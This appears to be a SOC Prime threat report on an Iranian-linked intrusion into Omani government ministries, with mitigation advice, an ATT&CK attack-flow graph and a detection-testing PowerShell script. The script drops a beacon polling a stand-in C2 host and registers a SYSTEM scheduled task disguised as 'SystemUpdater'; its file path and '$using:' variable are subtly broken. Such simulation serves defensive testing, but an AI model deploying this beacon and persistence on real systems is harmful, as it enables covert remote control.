SOC Prime Bias: Critical

07 May 2026 18:33
newspaper icon hunt.io

Iranian-Nexus Attack Exposes 26,000 Citizen Records in Oman

Author Photo
SOC Prime Team linkedin icon Follow
Iranian-Nexus Attack Exposes 26,000 Citizen Records in Oman
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

A state-aligned Iranian threat actor compromised multiple government ministries in Oman by using webshells, ProxyShell exploits, and a custom command-and-control environment hosted on a UAE-based VPS. The attackers exfiltrated more than 26,000 user records and registry hives, then deployed post-compromise tools including Chisel and GodPotato to deepen access. The operation was further exposed by an open directory that unintentionally revealed the attackers’ tooling, scripts, and C2 logs, providing visibility into the full intrusion lifecycle.

Investigation

Researchers accessed the exposed VPS at 172.86.76.127 and identified webshells, Python-based command-and-control scripts, privilege-escalation tools, and multiple exploit scripts targeting ProxyShell and the DNN SSRF vulnerability. Network logs showed beaconing activity over ports 8001 and 8002, along with use of Chisel tunnels for covert access. The investigation also documented scheduled task creation, extraction of registry hives, and large-scale data dumping from compromised systems.

Mitigation

Organizations should apply all patches related to ProxyShell in Microsoft Exchange and remediate the DNN SSRF issue tracked as CVE-2025-32372. Web applications should be hardened, IIS accounts should run with least privilege, and unused ASP.NET pages should be disabled wherever possible. Defenders should also deploy web application firewalls, monitor outbound traffic over unusual ports, and regularly inspect internet-facing servers for abandoned or exposed directories.

Response

Security teams should create detections for webshell access patterns, PowerShell beaconing behavior, Chisel tunnel activity, and suspicious scheduled task creation. Incident responders should collect web server logs, registry hives, and any database dumps for forensic analysis. Affected systems should be isolated, credentials rotated, and the relevant Omani authorities or stakeholders notified without delay.

"graph TB %% Class Definitions Section classDef technique fill:#c2e0ff classDef tool fill:#cccccc %% Node Definitions u2013 Techniques initial_access["<b>Technique</b> – <b>T1190 Exploit Public-Facing Application</b><br/>Method: ProxyShell & DNN SSRF"] class initial_access technique remote_services["<b>Technique</b> – <b>T1210 Exploitation of Remote Services</b><br/>Lateral movement"] class remote_services technique web_shell["<b>Technique</b> – <b>T1505.003 Web Shell</b><br/>Deployed: hc2.aspx / health_check_t.aspx"] class web_shell technique c2_bidir["<b>Technique</b> – <b>T1102.002 Web Service Bidirectional Communication</b><br/>HTTP C2 server"] class c2_bidir technique tunneling["<b>Technique</b> – <b>T1572 Protocol Tunneling</b> & <b>T1219.001 IDE Tunneling</b><br/>Tool: Chisel"] class tunneling technique weaken_enc["<b>Technique</b> – <b>T1600 Weaken Encryption</b><br/>Applied to tunnel"] class weaken_enc technique priv_esc["<b>Technique</b> – <b>T1134.003 Access Token Manipulation</b> & <b>T1068 Exploitation for Privilege Escalation</b><br/>Tool: GodPotato"] class priv_esc technique account_manip["<b>Technique</b> – <b>T1098 Account Manipulation</b><br/>Maintain elevated rights"] class account_manip technique cred_access["<b>Technique</b> – <b>T1012 Query Registry</b><br/>Steal SAM/System hives"] class cred_access technique def_evasion["<b>Technique</b> – <b>T1562 Impair Defenses</b> & <b>T1668 Exclusive Control</b><br/>Disable AV"] class def_evasion technique discovery["<b>Technique</b> – <b>T1592.002 Gather Victim Host Info</b> & <b>T1590.001 Network Domain Properties</b>"] class discovery technique exfiltration["<b>Technique</b> – <b>T1041 Exfiltration Over C2 Channel</b> & <b>T1030 Data Transfer Size Limits</b>"] class exfiltration technique oneway["<b>Technique</b> – <b>T1102.003 One-Way Web Service Communication</b><br/>Result posting"] class oneway technique %% Node Definitions u2013 Tools / Malware tool_proxyshell["<b>Tool</b> – <b>Name</b>: ProxyShell<br/><b>Purpose</b>: Exploit Exchange Server"] class tool_proxyshell tool tool_chisel["<b>Tool</b> – <b>Name</b>: Chisel<br/><b>Purpose</b>: Tunneling"] class tool_chisel tool tool_godpotato["<b>Tool</b> – <b>Name</b>: GodPotato<br/><b>Purpose</b>: Privilege escalation"] class tool_godpotato tool %% Connections u2013 Attack Flow initial_access –>|leads_to| remote_services initial_access –>|uses| tool_proxyshell remote_services –>|leads_to| web_shell web_shell –>|enables| c2_bidir c2_bidir –>|uses| tunneling tunneling –>|uses| tool_chisel tunneling –>|enables| weaken_enc weaken_enc –>|enables| priv_esc priv_esc –>|uses| tool_godpotato priv_esc –>|enables| account_manip account_manip –>|enables| cred_access cred_access –>|enables| def_evasion def_evasion –>|enables| discovery discovery –>|enables| exfiltration exfiltration –>|uses| oneway "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:
    The attacker has already gained a foothold on the victim machine and wishes to establish a low‑noise C2 beacon. They drop the PowerShell script new_beacon.ps1 into the user’s AppData folder. The script runs in an infinite loop, polling a remote C2 every 30 seconds. Each HTTP request is crafted with a Chrome UA string to blend in with normal web traffic, thereby evading network‑based detections (T1217, T1674). The attacker starts the beacon via a scheduled task to ensure persistence (T1204.004).

  • Regression Test Script:

    # -------------------------------------------------
# Deploy and start the new_beacon PowerShell beacon
# -------------------------------------------------
$beaconPath = "$env:APPDATAnew_beacon.ps1"
$c2Url = "http://malicious.example.com/beacon"

# 1. Write the beacon script (simulated lightweight version)
$scriptContent = @'
while ($true) {
    $headers = @{
        "User-Agent" = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36"
    }
    try {
        Invoke-WebRequest -Uri "$using:c2Url" -Headers $headers -Method GET -TimeoutSec 10 | Out-Null
    } catch {}
    Start-Sleep -Seconds 30
}
'@
Set-Content -Path $beaconPath -Value $scriptContent -Encoding UTF8

# 2. Register a scheduled task for persistence (runs every minute)
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-NoProfile -ExecutionPolicy Bypass -File `"$beaconPath`""
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration ([TimeSpan]::MaxValue)
$principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest
Register-ScheduledTask -TaskName "SystemUpdater" -Action $action -Trigger $trigger -Principal $principal -Force

Write-Host "Beacon deployed and scheduled task created."

  • Cleanup Commands:

    # -------------------------------------------------
# Remove beacon and scheduled task
# -------------------------------------------------
$beaconPath = "$env:APPDATAnew_beacon.ps1"
Unregister-ScheduledTask -TaskName "SystemUpdater" -Confirm:$false
Remove-Item -Path $beaconPath -Force -ErrorAction SilentlyContinue
Write-Host "Cleanup completed."

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free